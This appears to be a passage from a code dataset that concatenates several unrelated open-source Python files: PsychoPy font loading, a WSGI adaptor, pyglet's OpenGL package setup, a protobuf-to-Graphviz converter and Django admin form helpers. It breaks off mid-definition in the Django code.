code
stringlengths
733
1.05M
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Created on Sun Nov 10 12:18:45 2013 @author: Sol """ from __future__ import absolute_import, division, print_function from builtins import chr from builtins import object import os import math import numpy as np import unicodedata as ud from matplotlib import font_manager from psychopy.core import getTime from freetype import Face, FT_LOAD_RENDER, FT_LOAD_FORCE_AUTOHINT, FT_Exception from .textureatlas import TextureAtlas from pyglet.gl import (glGenLists, glNewList, GL_COMPILE, GL_QUADS, glBegin, glTexCoord2f, glVertex2f, glEnd, glDeleteLists, glEndList, glTranslatef, glDeleteTextures) log = math.log ceil = math.ceil def nearestPow2(n): return pow(2, int(log(n, 2) + 0.5)) def nextPow2(n): return int(pow(2, ceil(log(n, 2)))) class FontManager(object): """FontManager provides a simple API for finding and loading font files (.ttf) via the FreeType lib The FontManager finds supported font files on the computer and initially creates a dictionary containing the information about available fonts. This can be used to quickly determine what font family names are available on the computer and what styles (bold, italic) are supported for each family. This font information can then be used to create the resources necessary to display text using a given font family, style, size, color, and dpi. The FontManager is currently used by the psychopy.visual.TextBox stim type. A user script can access the FontManager via: font_mngr=visual.textbox.getFontManager() A user script never creates an instance of the FontManager class and should always access it using visual.textbox.getFontManager(). Once a font of a given size and dpi has been created; it is cached by the FontManager and can be used by all TextBox instances created within the experiment. """ freetype_import_error = None font_atlas_dict = {} font_family_styles = [] _available_font_info = {} font_store = None def __init__(self, monospace_only=True): # if FontManager.freetype_import_error: # raise Exception('Appears the freetype library could not load. # Error: %s'%(str(FontManager.freetype_import_error))) self.load_monospace_only = monospace_only self.updateFontInfo(monospace_only) def getFontFamilyNames(self): """Returns a list of the available font family names. """ return list(self._available_font_info.keys()) def getFontStylesForFamily(self, family_name): """For the given family_name, a list of style names supported is returned. """ style_dict = self._available_font_info.get(family_name) if style_dict: return list(style_dict.keys()) def getFontFamilyStyles(self): """Returns a list where each element of the list is a itself a two element list of [font_family_name,[font_style_names_list]] """ return self.font_family_styles def getFontsMatching(self, font_family_name, bold=False, italic=False, font_style=None): """ Returns the list of FontInfo instances that match the provided font_family_name and style information. If no matching fonts are found, None is returned. """ style_dict = self._available_font_info.get(font_family_name) if style_dict is None: return None if font_style and font_style in style_dict: return style_dict[font_style] for style, fonts in style_dict.items(): b, i = self.booleansFromStyleName(style) if b == bold and i == italic: return fonts return None def addFontFile(self, font_path, monospace_only=True): """ Add a Font File to the FontManger font search space. The font_path must be a valid path including the font file name. Relative paths can be used, with the current working directory being the origin. If monospace_only is True, the font file will only be added if it is a monospace font (as only monospace fonts are currently supported by TextBox). Adding a Font to the FontManager is not persistent across runs of the script, so any extra font paths need to be added each time the script starts. """ return self.addFontFiles((font_path,), monospace_only) def addFontFiles(self, font_paths, monospace_only=True): """ Add a list of font files to the FontManger font search space. Each element of the font_paths list must be a valid path including the font file name. Relative paths can be used, with the current working directory being the origin. If monospace_only is True, each font file will only be added if it is a monospace font (as only monospace fonts are currently supported by TextBox). Adding fonts to the FontManager is not persistent across runs of the script, so any extra font paths need to be added each time the script starts. """ fi_list = [] for fp in font_paths: if os.path.isfile(fp) and os.path.exists(fp): face = Face(fp) if monospace_only: if face.is_fixed_width: fi_list.append(self._createFontInfo(fp, face)) else: fi_list.append(self._createFontInfo(fp, face)) self.font_family_styles.sort() return fi_list def addFontDirectory(self, font_dir, monospace_only=True, recursive=False): """ Add any font files found in font_dir to the FontManger font search space. Each element of the font_paths list must be a valid path including the font file name. Relative paths can be used, with the current working directory being the origin. If monospace_only is True, each font file will only be added if it is a monospace font (as only monospace fonts are currently supported by TextBox). Adding fonts to the FontManager is not persistent across runs of the script, so any extra font paths need to be added each time the script starts. """ from os import walk font_paths = [] for (dirpath, dirnames, filenames) in walk(font_dir): ttf_files = [os.path.join(dirpath, fname) for fname in filenames if fname.lower().endswith('.ttf')] font_paths.extend(ttf_files) if not recursive: break return self.addFontFiles(font_paths) return fi # Class methods for FontManager below this comment should not need to be # used by user scripts in most situations. Accessing them is okay. @staticmethod def getGLFont(font_family_name, size=32, bold=False, italic=False, dpi=72): """ Return a FontAtlas object that matches the family name, style info, and size provided. FontAtlas objects are cached, so if multiple TextBox instances use the same font (with matching font properties) then the existing FontAtlas is returned. Otherwise, a new FontAtlas is created , added to the cache, and returned. """ from psychopy.visual.textbox import getFontManager fm = getFontManager() if fm: font_infos = fm.getFontsMatching(font_family_name, bold, italic) if len(font_infos) == 0: return False font_info = font_infos[0] fid = MonospaceFontAtlas.getIdFromArgs(font_info, size, dpi) font_atlas = fm.font_atlas_dict.get(fid) if font_atlas is None: font_atlas = fm.font_atlas_dict.setdefault( fid, MonospaceFontAtlas(font_info, size, dpi)) font_atlas.createFontAtlas() if fm.font_store: t1 = getTime() fm.font_store.addFontAtlas(font_atlas) t2 = getTime() print('font store add atlas:', t2 - t1) return font_atlas def getFontInfo(self, refresh=False, monospace=True): """ Returns the available font information as a dict of dict's. The first level dict has keys for the available font families. The second level dict has keys for the available styles of the associated font family. The values in the second level font family - style dict are each a list containing FontInfo objects. There is one FontInfo object for each physical font file found that matches the associated font family and style. """ if refresh or not self._available_font_info: self.updateFontInfo(monospace) return self._available_font_info def updateFontInfo(self, monospace_only=True): self._available_font_info.clear() del self.font_family_styles[:] fonts_found = font_manager.findSystemFonts() self.addFontFiles(fonts_found, monospace_only) def booleansFromStyleName(self, style): """ For the given style name, return a bool indicating if the font is bold, and a second indicating if it is italics. """ italic = False bold = False s = style.lower().strip() if s == 'regular': return False, False if s.find(b'italic') >= 0 or s.find(b'oblique') >= 0: italic = True if s.find(b'bold') >= 0: bold = True return bold, italic def _createFontInfo(self, fp, fface): fns = (fface.family_name, fface.style_name) if fns in self.font_family_styles: pass else: self.font_family_styles.append( (fface.family_name, fface.style_name)) styles_for_font_dict = self._available_font_info.setdefault( fface.family_name, {}) fonts_for_style = styles_for_font_dict.setdefault(fface.style_name, []) fi = FontInfo(fp, fface) fonts_for_style.append(fi) return fi def __del__(self): self.font_store = None if self.font_atlas_dict: self.font_atlas_dict.clear() self.font_atlas_dict = None if self._available_font_info: self._available_font_info.clear() self._available_font_info = None class FontInfo(object): def __init__(self, fp, face): self.path = fp self.family_name = face.family_name self.style_name = face.style_name self.charmaps = [charmap.encoding_name for charmap in face.charmaps] self.num_faces = face.num_faces self.num_glyphs = face.num_glyphs #self.size_info= [dict(width=s.width,height=s.height, # x_ppem=s.x_ppem,y_ppem=s.y_ppem) for s in face.available_sizes] self.units_per_em = face.units_per_EM self.monospace = face.is_fixed_width self.charmap_id = face.charmap.index self.label = "%s_%s" % (face.family_name, face.style_name) self.id = self.label def getID(self): return self.id def asdict(self): d = {} for k, v in self.__dict__.items(): if k[0] != '_': d[k] = v return d class MonospaceFontAtlas(object): def __init__(self, font_info, size, dpi): self.font_info = font_info self.size = size self.dpi = dpi self.id = self.getIdFromArgs(font_info, size, dpi) self._face = Face(font_info.path) self._face.set_char_size(height=self.size * 64, vres=self.dpi) self.charcode2glyph = None self.charcode2unichr = None self.charcode2displaylist = None self.max_ascender = None self.max_descender = None self.max_tile_width = None self.max_tile_height = None self.max_bitmap_size = None self.total_bitmap_area = 0 self.atlas = None def getID(self): return self.id @staticmethod def getIdFromArgs(font_info, size, dpi): return "%s_%d_%d" % (font_info.getID(), size, dpi) def createFontAtlas(self): if self.atlas: self.atlas.free() self.atlas = None self.charcode2glyph = {} self.charcode2unichr = {} self.max_ascender = None self.max_descender = None self.max_tile_width = None self.max_tile_height = None self.max_bitmap_size = None self.total_bitmap_area = 0 # load font glyphs and calculate max. char size. # This is used when the altas is created to properly size the tex. # i.e. max glyph size * num glyphs max_w, max_h = 0, 0 max_ascender, max_descender, max_tile_width = 0, 0, 0 face = self._face face.set_char_size(height=self.size * 64, vres=self.dpi) # Create texAtlas for glyph set. x_ppem = face.size.x_ppem y_ppem = face.size.x_ppem units_ppem = self.font_info.units_per_em est_max_width = ((face.bbox.xMax - face.bbox.xMin) / float(units_ppem) * x_ppem) est_max_height = face.size.ascender / float(units_ppem) * y_ppem target_atlas_area = int( est_max_width * est_max_height) * face.num_glyphs # make sure it is big enough. ;) # height is trimmed before sending to video ram anyhow. target_atlas_area = target_atlas_area * 3.0 pow2_area = nextPow2(target_atlas_area) atlas_width = 2048 atlas_height = pow2_area / atlas_width self.atlas = TextureAtlas(atlas_width, atlas_height * 2) charcode, gindex = face.get_first_char() while gindex: uchar = chr(charcode) if ud.category(uchar) not in (u'Zl', u'Zp', u'Cc', u'Cf', u'Cs', u'Co', u'Cn'): self.charcode2unichr[charcode] = uchar face.load_char(uchar, FT_LOAD_RENDER | FT_LOAD_FORCE_AUTOHINT) bitmap = face.glyph.bitmap self.total_bitmap_area += bitmap.width * bitmap.rows max_ascender = max(max_ascender, face.glyph.bitmap_top) max_descender = max( max_descender, bitmap.rows - face.glyph.bitmap_top) max_tile_width = max(max_tile_width, bitmap.width) max_w = max(bitmap.width, max_w) max_h = max(bitmap.rows, max_h) x, y, w, h = self.atlas.get_region( bitmap.width + 2, bitmap.rows + 2) if x < 0: msg = ("MonospaceFontAtlas.get_region failed " "for: {0}, requested area: {1}. Atlas Full!") vals = charcode, (bitmap.width + 2, bitmap.rows + 2) raise Exception(msg.format(vals)) x, y = x + 1, y + 1 w, h = w - 2, h - 2 data = np.array( bitmap._FT_Bitmap.buffer[:(bitmap.rows * bitmap.width)], dtype=np.ubyte).reshape(h, w, 1) self.atlas.set_region((x, y, w, h), data) self.charcode2glyph[charcode] = dict( offset=(face.glyph.bitmap_left, face.glyph.bitmap_top), size=(w, h), atlas_coords=(x, y, w, h), texcoords=[x, y, x + w, y + h], index=gindex, unichar=uchar) charcode, gindex = face.get_next_char(charcode, gindex) self.max_ascender = max_ascender self.max_descender = max_descender self.max_tile_width = max_tile_width self.max_tile_height = max_ascender + max_descender self.max_bitmap_size = max_w, max_h # resize atlas height = nextPow2(self.atlas.max_y + 1) self.atlas.resize(height) self.atlas.upload() self.createDisplayLists() self._face = None def createDisplayLists(self): glyph_count = len(self.charcode2unichr) max_tile_width = self.max_tile_width max_tile_height = self.max_tile_height display_lists_for_chars = {} base = glGenLists(glyph_count) for i, (charcode, glyph) in enumerate(self.charcode2glyph.items()): dl_index = base + i uchar = self.charcode2unichr[charcode] # update tex coords to reflect earlier resize of atlas height. gx1, gy1, gx2, gy2 = glyph['texcoords'] gx1 = gx1/float(self.atlas.width) gy1 = gy1/float(self.atlas.height) gx2 = gx2/float(self.atlas.width) gy2 = gy2/float(self.atlas.height) glyph['texcoords'] = [gx1, gy1, gx2, gy2] glNewList(dl_index, GL_COMPILE) if uchar not in [u'\t', u'\n']: glBegin(GL_QUADS) x1 = glyph['offset'][0] x2 = x1 + glyph['size'][0] y1 = (self.max_ascender - glyph['offset'][1]) y2 = y1 + glyph['size'][1] glTexCoord2f(gx1, gy2), glVertex2f(x1, -y2) glTexCoord2f(gx1, gy1), glVertex2f(x1, -y1) glTexCoord2f(gx2, gy1), glVertex2f(x2, -y1) glTexCoord2f(gx2, gy2), glVertex2f(x2, -y2) glEnd() glTranslatef(max_tile_width, 0, 0) glEndList() display_lists_for_chars[charcode] = dl_index self.charcode2displaylist = display_lists_for_chars def saveGlyphBitmap(self, file_name=None): if file_name is None: import os file_name = os.path.join(os.getcwd(), self.getID().lower().replace(u' ', u'_') + '.png') from scipy import misc if self.atlas is None: self.loadAtlas() if self.atlas.depth == 1: misc.imsave(file_name, self.atlas.data.reshape( self.atlas.data.shape[:2])) else: misc.imsave(file_name, self.atlas.data) def __del__(self): self._face = None if self.atlas.texid is not None: #glDeleteTextures(1, self.atlas.texid) self.atlas.texid = None self.atlas = None if self.charcode2displaylist is not None: # for dl in self.charcode2displaylist.values(): # glDeleteLists(dl, 1) self.charcode2displaylist.clear() self.charcode2displaylist = None if self.charcode2glyph is not None: self.charcode2glyph.clear() self.charcode2glyph = None if self.charcode2unichr is not None: self.charcode2unichr.clear() self.charcode2unichr = None
import cStringIO, urllib, time, traceback import odict class ClientConn: def __init__(self, address): self.address = address class Request: def __init__(self, client_conn, scheme, method, path, headers, content): self.scheme, self.method, self.path = scheme, method, path self.headers, self.content = headers, content self.client_conn = client_conn def date_time_string(): """Return the current date and time formatted for a message header.""" WEEKS = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun'] MONTHS = [None, 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'] now = time.time() year, month, day, hh, mm, ss, wd, y, z = time.gmtime(now) s = "%s, %02d %3s %4d %02d:%02d:%02d GMT" % ( WEEKS[wd], day, MONTHS[month], year, hh, mm, ss) return s class WSGIAdaptor: def __init__(self, app, domain, port, sversion): self.app, self.domain, self.port, self.sversion = app, domain, port, sversion def make_environ(self, request, errsoc): if '?' in request.path: path_info, query = request.path.split('?', 1) else: path_info = request.path query = '' environ = { 'wsgi.version': (1, 0), 'wsgi.url_scheme': request.scheme, 'wsgi.input': cStringIO.StringIO(request.content), 'wsgi.errors': errsoc, 'wsgi.multithread': True, 'wsgi.multiprocess': False, 'wsgi.run_once': False, 'SERVER_SOFTWARE': self.sversion, 'REQUEST_METHOD': request.method, 'SCRIPT_NAME': '', 'PATH_INFO': urllib.unquote(path_info), 'QUERY_STRING': query, 'CONTENT_TYPE': request.headers.get('Content-Type', [''])[0], 'CONTENT_LENGTH': request.headers.get('Content-Length', [''])[0], 'SERVER_NAME': self.domain, 'SERVER_PORT': str(self.port), # FIXME: We need to pick up the protocol read from the request. 'SERVER_PROTOCOL': "HTTP/1.1", } if request.client_conn.address: environ["REMOTE_ADDR"], environ["REMOTE_PORT"] = request.client_conn.address for key, value in request.headers.items(): key = 'HTTP_' + key.upper().replace('-', '_') if key not in ('HTTP_CONTENT_TYPE', 'HTTP_CONTENT_LENGTH'): environ[key] = value return environ def error_page(self, soc, headers_sent, s): """ Make a best-effort attempt to write an error page. If headers are already sent, we just bung the error into the page. """ c = """ <html> <h1>Internal Server Error</h1> <pre>%s"</pre> </html> """%s if not headers_sent: soc.write("HTTP/1.1 500 Internal Server Error\r\n") soc.write("Content-Type: text/html\r\n") soc.write("Content-Length: %s\r\n"%len(c)) soc.write("\r\n") soc.write(c) def serve(self, request, soc): state = dict( response_started = False, headers_sent = False, status = None, headers = None ) def write(data): if not state["headers_sent"]: soc.write("HTTP/1.1 %s\r\n"%state["status"]) h = state["headers"] if 'server' not in h: h["Server"] = [self.sversion] if 'date' not in h: h["Date"] = [date_time_string()] soc.write(str(h)) soc.write("\r\n") state["headers_sent"] = True if data: soc.write(data) soc.flush() def start_response(status, headers, exc_info=None): if exc_info: try: if state["headers_sent"]: raise exc_info[0], exc_info[1], exc_info[2] finally: exc_info = None elif state["status"]: raise AssertionError('Response already started') state["status"] = status state["headers"] = odict.ODictCaseless(headers) return write errs = cStringIO.StringIO() try: dataiter = self.app(self.make_environ(request, errs), start_response) for i in dataiter: write(i) if not state["headers_sent"]: write("") except Exception: try: s = traceback.format_exc() errs.write(s) self.error_page(soc, state["headers_sent"], s) except Exception: # pragma: no cover pass return errs.getvalue()
# ---------------------------------------------------------------------------- # pyglet # Copyright (c) 2006-2008 Alex Holkner # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in # the documentation and/or other materials provided with the # distribution. # * Neither the name of pyglet nor the names of its # contributors may be used to endorse or promote products # derived from this software without specific prior written # permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # ---------------------------------------------------------------------------- '''OpenGL and GLU interface. This package imports all OpenGL, GLU and registered OpenGL extension functions. Functions have identical signatures to their C counterparts. For example:: from pyglet.gl import * # [...omitted: set up a GL context and framebuffer] glBegin(GL_QUADS) glVertex3f(0, 0, 0) glVertex3f(0.1, 0.2, 0.3) glVertex3f(0.1, 0.2, 0.3) glEnd() OpenGL is documented in full at the `OpenGL Reference Pages`_. The `OpenGL Programming Guide`_ is a popular reference manual organised by topic. The free online version documents only OpenGL 1.1. `Later editions`_ cover more recent versions of the API and can be purchased from a book store. .. _OpenGL Reference Pages: http://www.opengl.org/documentation/red_book/ .. _OpenGL Programming Guide: http://fly.cc.fer.hr/~unreal/theredbook/ .. _Later editions: http://www.opengl.org/documentation/red_book/ The following subpackages are imported into this "mega" package already (and so are available by importing ``pyglet.gl``): ``pyglet.gl.gl`` OpenGL ``pyglet.gl.glu`` GLU ``pyglet.gl.gl.glext_arb`` ARB registered OpenGL extension functions These subpackages are also available, but are not imported into this namespace by default: ``pyglet.gl.glext_nv`` nVidia OpenGL extension functions ``pyglet.gl.agl`` AGL (Mac OS X OpenGL context functions) ``pyglet.gl.glx`` GLX (Linux OpenGL context functions) ``pyglet.gl.glxext_arb`` ARB registered GLX extension functions ``pyglet.gl.glxext_nv`` nvidia GLX extension functions ``pyglet.gl.wgl`` WGL (Windows OpenGL context functions) ``pyglet.gl.wglext_arb`` ARB registered WGL extension functions ``pyglet.gl.wglext_nv`` nvidia WGL extension functions The information modules are provided for convenience, and are documented below. ''' __docformat__ = 'restructuredtext' __version__ = '$Id$' from pyglet.gl.lib import GLException from pyglet.gl.gl import * from pyglet.gl.glu import * from pyglet.gl.glext_arb import * from pyglet.gl import gl_info import sys as _sys _is_epydoc = hasattr(_sys, 'is_epydoc') and _sys.is_epydoc #: The active OpenGL context. #: #: You can change the current context by calling `Context.set_current`; do not #: modify this global. #: #: :type: `Context` #: #: :since: pyglet 1.1 current_context = None def get_current_context(): '''Return the active OpenGL context. You can change the current context by calling `Context.set_current`. :deprecated: Use `current_context` :rtype: `Context` :return: the context to which OpenGL commands are directed, or None if there is no selected context. ''' return current_context class ContextException(Exception): pass class ConfigException(Exception): pass import pyglet as _pyglet if _pyglet.options['debug_texture']: _debug_texture_total = 0 _debug_texture_sizes = {} _debug_texture = None def _debug_texture_alloc(texture, size): global _debug_texture_total _debug_texture_sizes[texture] = size _debug_texture_total += size print '%d (+%d)' % (_debug_texture_total, size) def _debug_texture_dealloc(texture): global _debug_texture_total size = _debug_texture_sizes[texture] del _debug_texture_sizes[texture] _debug_texture_total -= size print '%d (-%d)' % (_debug_texture_total, size) _glBindTexture = glBindTexture def glBindTexture(target, texture): global _debug_texture _debug_texture = texture return _glBindTexture(target, texture) _glTexImage2D = glTexImage2D def glTexImage2D(target, level, internalformat, width, height, border, format, type, pixels): try: _debug_texture_dealloc(_debug_texture) except KeyError: pass if internalformat in (1, GL_ALPHA, GL_INTENSITY, GL_LUMINANCE): depth = 1 elif internalformat in (2, GL_RGB16, GL_RGBA16): depth = 2 elif internalformat in (3, GL_RGB): depth = 3 else: depth = 4 # Pretty crap assumption size = (width + 2 * border) * (height + 2 * border) * depth _debug_texture_alloc(_debug_texture, size) return _glTexImage2D(target, level, internalformat, width, height, border, format, type, pixels) _glDeleteTextures = glDeleteTextures def glDeleteTextures(n, textures): if not hasattr(textures, '__len__'): _debug_texture_dealloc(textures.value) else: for i in range(n): _debug_texture_dealloc(textures[i].value) return _glDeleteTextures(n, textures) def _create_shadow_window(): global _shadow_window import pyglet if not pyglet.options['shadow_window'] or _is_epydoc: return from pyglet.window import Window _shadow_window = Window(width=1, height=1, visible=False) _shadow_window.switch_to() from pyglet import app app.windows.remove(_shadow_window) from base import ObjectSpace, CanvasConfig, Context if _is_epydoc: from base import Config elif _sys.platform in ('win32', 'cygwin'): from win32 import Win32Config as Config elif _sys.platform.startswith('linux'): from xlib import XlibConfig as Config elif _sys.platform == 'darwin': if _pyglet.options['darwin_cocoa']: from cocoa import CocoaConfig as Config else: from carbon import CarbonConfig as Config del base # XXX remove _shadow_window = None # Import pyglet.window now if it isn't currently being imported (this creates # the shadow window). if (not _is_epydoc and 'pyglet.window' not in _sys.modules and _pyglet.options['shadow_window']): # trickery is for circular import _pyglet.gl = _sys.modules[__name__] import pyglet.window
import sys from os.path import isfile import argparse from antlr4 import * from ProtoLexer import ProtoLexer from ProtoParser import ProtoParser, ProtoParserListener from os.path import split, join, realpath class BaseListener(ProtoParserListener): _processed_files = [] def __init__(self, targeted_dir, import_dirs, ostream): self._targeted_dir = targeted_dir self._import_dirs = import_dirs self._ostream = ostream # def exitProto(self, ctx): # print("Oh, a proto!") def give_me_some_import_file(self, import_file_name): realpath_import_file_name = realpath(join(self._targeted_dir, import_file_name)) if isfile(realpath_import_file_name): return realpath_import_file_name realpath_import_file_name = realpath(import_file_name) if isfile(realpath_import_file_name): return realpath_import_file_name for d in self._import_dirs: realpath_import_file_name = realpath(join(d, import_file_name)) #print ('?: %s' % realpath_import_file_name, file=sys.stderr) if isfile(realpath_import_file_name): return realpath_import_file_name raise Exception("Can't find any file as for '%s'. You may want to specify -I dir for a import search path" % import_file_name) def exitImport_file_name(self, ctx): # print("oh, a file name...") # print(dir(ctx)) import_file_name = ctx.getText()[1:] import_file_name = import_file_name[:(len(import_file_name) - 1)] pathname = self.give_me_some_import_file(import_file_name) if len(list(ctx.parentCtx.getChildren())) != 2: raise Exception('This form of import is not supported yet, sorry.') if pathname not in self._processed_files: self._processed_files.append(pathname) FileToTreeParser(pathname, self._import_dirs, ostream=self._ostream) class DotListener(BaseListener): _basic_types = ['double', 'float', 'int32', 'int64', 'uint32', 'uint64', 'sint32', 'sint64', 'fixed32', 'fixed64', 'sfixed32', 'sfixed64', 'bool', 'string', 'bytes'] _prologue = '''digraph G { fontname = "Bitstream Vera Sans" fontsize = 8 node [ fontname = "Bitstream Vera Sans" fontsize = 8 shape = "record" ] edge [ fontname = "Bitstream Vera Sans" fontsize = 8 arrowhead = diamond labeldistance = 2 ] ''' _epilogue = '\n}\n' _attribute_fmt = '+ %(attribute_name)s : %(attribute_type)s\l' _node_prologue_fmt = ''' %(class_name)s [ label = "{%(class_name)s|''' _node_epilogue_fmt = '|}"\n ]' def __init__(self, targeted_dir, import_dirs, ostream): super().__init__(targeted_dir, import_dirs, ostream) self._aggregations = [] def enterMessage_def(self, ctx): class_name = ctx.getChild(1).getText() print(self._node_prologue_fmt % { 'class_name' : class_name }, file=self._ostream) self._curr_message = class_name def exitMessage_def(self, ctx): print(self._node_epilogue_fmt, file=self._ostream) def exitMessage_item_def(self, ctx): qualifier = ctx.getChild(0).getText().lower() attribute_type = ctx.getChild(1).getText() attribute_name = ctx.getChild(2).getText() if attribute_type in self._basic_types: print(self._attribute_fmt % {'attribute_name' : attribute_name, 'attribute_type' : attribute_type}, file=self._ostream) else: if qualifier == 'optional': quantifier = '"0..1"' if qualifier == 'required': quantifier = '"1"' if qualifier == 'repeated': quantifier = '"0..*"' self._aggregations.append((attribute_type, self._curr_message, "1", attribute_name, quantifier)) def exitProto(self, ctx): # from pprint import pprint # pprint(self._aggregations) for edge in self._aggregations: # print('E: %s' % str(edge)) print(' edge[headlabel=%s, label=%s, taillabel=%s]\n' % edge[2:], file=self._ostream) print(' %s -> %s\n' % edge[:2], file=self._ostream) class FileToTreeParser(object): def __init__(self, pathname, import_dirs, ostream): self._pathname = pathname self._dir, self._filename = split(pathname) input = FileStream(pathname) lexer = ProtoLexer(input) stream = CommonTokenStream(lexer) parser = ProtoParser(stream) self._tree = parser.proto() printer = DotListener(targeted_dir=self._dir, import_dirs = import_dirs, ostream=ostream) walker = ParseTreeWalker() walker.walk(printer, self._tree) def non_cli_main(pathname_protobuf_ifile, import_dirs, ostream=sys.stdout): print(DotListener._prologue, file=ostream) file_to_tree_parser = FileToTreeParser(pathname_protobuf_ifile, import_dirs=import_dirs, ostream=ostream) print(DotListener._epilogue, file=ostream) # print (file_to_tree_parser._tree.toStringTree()) # print('------') def cli_main(): parser = argparse.ArgumentParser() parser.add_argument('-I', '--proto_path', help='search also this colon-separated list of directories for proto imports') parser.add_argument('proto_file') args = parser.parse_args() import_dirs = args.proto_path.split(':') if args.proto_path else [] non_cli_main(pathname_protobuf_ifile = args.proto_file, import_dirs = import_dirs, ostream=sys.stdout) if __name__ == '__main__': cli_main()
from django import forms from django.conf import settings from django.contrib.admin.util import flatten_fieldsets, lookup_field from django.contrib.admin.util import display_for_field, label_for_field from django.contrib.contenttypes.models import ContentType from django.core.exceptions import ObjectDoesNotExist from django.db.models.fields.related import ManyToManyRel from django.forms.util import flatatt from django.template.defaultfilters import capfirst from django.utils.encoding import force_unicode, smart_unicode from django.utils.html import escape, conditional_escape from django.utils.safestring import mark_safe from django.utils.translation import ugettext_lazy as _ ACTION_CHECKBOX_NAME = '_selected_action' class ActionForm(forms.Form): action = forms.ChoiceField(label=_('Action:')) select_across = forms.BooleanField(label='', required=False, initial=0, widget=forms.HiddenInput({'class': 'select-across'})) checkbox = forms.CheckboxInput({'class': 'action-select'}, lambda value: False) class AdminForm(object): def __init__(self, form, fieldsets, prepopulated_fields, readonly_fields=None, model_admin=None): self.form, self.fieldsets = form, normalize_fieldsets(fieldsets) self.prepopulated_fields = [{ 'field': form[field_name], 'dependencies': [form[f] for f in dependencies] } for field_name, dependencies in prepopulated_fields.items()] self.model_admin = model_admin if readonly_fields is None: readonly_fields = () self.readonly_fields = readonly_fields def __iter__(self): for name, options in self.fieldsets: yield Fieldset(self.form, name, readonly_fields=self.readonly_fields, model_admin=self.model_admin, **options ) def first_field(self): try: fieldset_name, fieldset_options = self.fieldsets[0] field_name = fieldset_options['fields'][0] if not isinstance(field_name, basestring): field_name = field_name[0] return self.form[field_name] except (KeyError, IndexError): pass try: return iter(self.form).next() except StopIteration: return None def _media(self): media = self.form.media for fs in self: media = media + fs.media return media media = property(_media) class Fieldset(object): def __init__(self, form, name=None, readonly_fields=(), fields=(), classes=(), description=None, model_admin=None): self.form = form self.name, self.fields = name, fields self.classes = u' '.join(classes) self.description = description self.model_admin = model_admin self.readonly_fields = readonly_fields def _media(self): if 'collapse' in self.classes: js = ['js/jquery.min.js', 'js/jquery.init.js', 'js/collapse.min.js'] return forms.Media(js=['%s%s' % (settings.ADMIN_MEDIA_PREFIX, url) for url in js]) return forms.Media() media = property(_media) def __iter__(self): for field in self.fields: yield Fieldline(self.form, field, self.readonly_fields, model_admin=self.model_admin) class Fieldline(object): def __init__(self, form, field, readonly_fields=None, model_admin=None): self.form = form # A django.forms.Form instance if not hasattr(field, "__iter__"): self.fields = [field] else: self.fields = field self.model_admin = model_admin if readonly_fields is None: readonly_fields = () self.readonly_fields = readonly_fields def __iter__(self): for i, field in enumerate(self.fields): if field in self.readonly_fields: yield AdminReadonlyField(self.form, field, is_first=(i == 0), model_admin=self.model_admin) else: yield AdminField(self.form, field, is_first=(i == 0)) def errors(self): return mark_safe(u'\n'.join([self.form[f].errors.as_ul() for f in self.fields if f not in self.readonly_fields]).strip('\n')) class AdminField(object): def __init__(self, form, field, is_first): self.field = form[field] # A django.forms.BoundField instance self.is_first = is_first # Whether this field is first on the line self.is_checkbox = isinstance(self.field.field.widget, forms.CheckboxInput) def label_tag(self): classes = [] if self.is_checkbox: classes.append(u'vCheckboxLabel') contents = force_unicode(escape(self.field.label)) else: contents = force_unicode(escape(self.field.label)) + u':' if self.field.field.required: classes.append(u'required') if not self.is_first: classes.append(u'inline') attrs = classes and {'class': u' '.join(classes)} or {} return self.field.label_tag(contents=contents, attrs=attrs) class AdminReadonlyField(object): def __init__(self, form, field, is_first, model_admin=None): label = label_for_field(field, form._meta.model, model_admin) # Make self.field look a little bit like a field. This means that # {{ field.name }} must be a useful class name to identify the field. # For convenience, store other field-related data here too. if callable(field): class_name = field.__name__ != '<lambda>' and field.__name__ or '' else: class_name = field self.field = { 'name': class_name, 'label': label, 'field': field, } self.form = form self.model_admin = model_admin self.is_first = is_first self.is_checkbox = False self.is_readonly = True def label_tag(self): attrs = {} if not self.is_first: attrs["class"] = "inline" label = self.field['label'] contents = capfirst(force_unicode(escape(label))) + u":" return mark_safe('<label%(attrs)s>%(contents)s</label>' % { "attrs": flatatt(attrs), "contents": contents, }) def contents(self): from django.contrib.admin.templatetags.admin_list import _boolean_icon from django.contrib.admin.views.main import EMPTY_CHANGELIST_VALUE field, obj, model_admin = self.field['field'], self.form.instance, self.model_admin try: f, attr, value = lookup_field(field, obj, model_admin) except (AttributeError, ValueError, ObjectDoesNotExist): result_repr = EMPTY_CHANGELIST_VALUE else: if f is None: boolean = getattr(attr, "boolean", False) if boolean: result_repr = _boolean_icon(value) else: result_repr = smart_unicode(value) if getattr(attr, "allow_tags", False): result_repr = mark_safe(result_repr) else: if value is None: result_repr = EMPTY_CHANGELIST_VALUE elif isinstance(f.rel, ManyToManyRel): result_repr = ", ".join(map(unicode, value.all())) else: result_repr = display_for_field(value, f) return conditional_escape(result_repr) class InlineAdminFormSet(object): """ A wrapper around an inline formset for use in the admin system. """ def 